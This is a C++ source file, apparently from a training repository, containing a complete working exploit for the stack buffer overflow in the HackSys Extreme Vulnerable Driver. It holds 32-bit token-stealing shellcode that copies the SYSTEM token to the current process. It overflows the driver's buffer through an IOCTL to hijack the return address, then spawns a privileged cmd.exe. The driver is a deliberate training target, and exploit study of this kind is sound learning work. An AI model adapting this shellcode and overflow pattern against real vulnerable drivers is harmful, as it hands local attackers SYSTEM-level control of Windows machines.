windows_kernel_exploitation_hevd/Kernel_Buffer_Overflow/exploit.cpp

// Compile: g++ .\exploit.cpp -m32 -static-libgcc -static-libstdc++ -o exploit.exe

#include <iostream>
#include <Windows.h>

#define IOCTL_id 0x222003
#define HEVD_DRIVER "\\\\.\\HacksysExtremeVulnerableDriver"

using namespace std;

int main() {
	
	int toEIP = 2084;
	char payload[toEIP];
	DWORD retIO;
	
	char shellcode[] = (
	
		/* Start */
		"\x60"					// pushad
		"\x31\xC0"				// xor eax, eax
		"\x64\xA1\x24\x01\x00\x00"		// mov eax, [fs:0x124]
		"\x8B\x40\x50"				// mov eax, [eax + 50h]
		"\x89\xC1"				// mov ecx, eax
		
		/* Loop PID search */
		"\x8B\x80\xB8\x00\x00\x00"		// mov eax, [eax + 0xb8]	<------------┐
		"\x2D\xB8\x00\x00\x00"			// sub eax, 0xb8 			     |
		"\x83\xB8\xB4\x00\x00\x00\x04"		// cmp dword [eax + 0xb4], 0x04		     |
		"\x75\xEC"				// jnz loop_search	>--------------------┘
		
		/* Token stealing */
		"\x8B\x90\xF8\x00\x00\x00"		// mov edx, [eax + 0x0f8]
		"\x8B\x99\xF8\x00\x00\x00"		// mov ebx, [ecx + 0x0f8]
		"\x83\xE2\xF8"				// and edx, 0xFFFFFFF8
		"\x83\xE3\x07"				// and ebx, 0x7
		"\x09\xDA"				// or edx, ebx
		"\x89\x91\xF8\x00\x00\x00"		// mov [ecx + 0x0f8], edx
		
		/* Restore */
		"\x61"					// popad
		"\x31\xC0"				// xor eax, eax
		"\x5D"					// pop ebp
		"\xC2\x08\x00"				// ret 8
		
	);
		
	HANDLE BOFDriver = CreateFileA(
		HEVD_DRIVER,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
	);
	
	if(BOFDriver == INVALID_HANDLE_VALUE) {
		
		cout << "[!] ERROR: Cannot handle the driver. (INVALID_HANDLE_VALUE)" << endl;
		return -1;
		
	}

	else {

		cout << "[+] Opened handle succesfully: " << hex << BOFDriver << endl;
		cout << "[+] Configuring the payload..." << endl;

		memset(payload, 0x41, toEIP - 8);
		memset(payload + 2076, 0x42, 4);	// Overwrite EBP
		//memset(payload + 2080, 0x43, 4);

		LPVOID privesc = VirtualAlloc(
			NULL,
			sizeof(shellcode),
			MEM_COMMIT | MEM_RESERVE,
			PAGE_EXECUTE_READWRITE
		);

		if (privesc == NULL) {
		
			cout << "[!] The shellcode cannot be allocated." << endl;
			return -2;
		
		}

		cout << "[+] Shellcode allocated: " << hex << privesc << endl;

		memcpy(privesc, shellcode, sizeof(shellcode));
		memcpy(&payload[2080], &privesc, 4);

		cout << "[+] Payload ready." << endl;
		cout << "[+] Sending the payload via IOCTL." << endl;

		BOOL IOCTLstate = DeviceIoControl(
			BOFDriver,
			IOCTL_id,
			payload,
			sizeof(payload),
			NULL,
			0,
			&retIO,
			NULL
		);

		if(IOCTLstate == 0) {
			
			cout << "[!] ERROR: The payload cannot be sended via IOCTL." << endl;
			return -3;
			
		}

		else {
			
			cout << "[+] The payload has been sent succesfully via IOCTL." << endl;
			cout << "[+] Spawning a privileged shell..." << endl;
			system("start cmd.exe");
			CloseHandle(BOFDriver);
			
			return 0;
			
		}

	}

}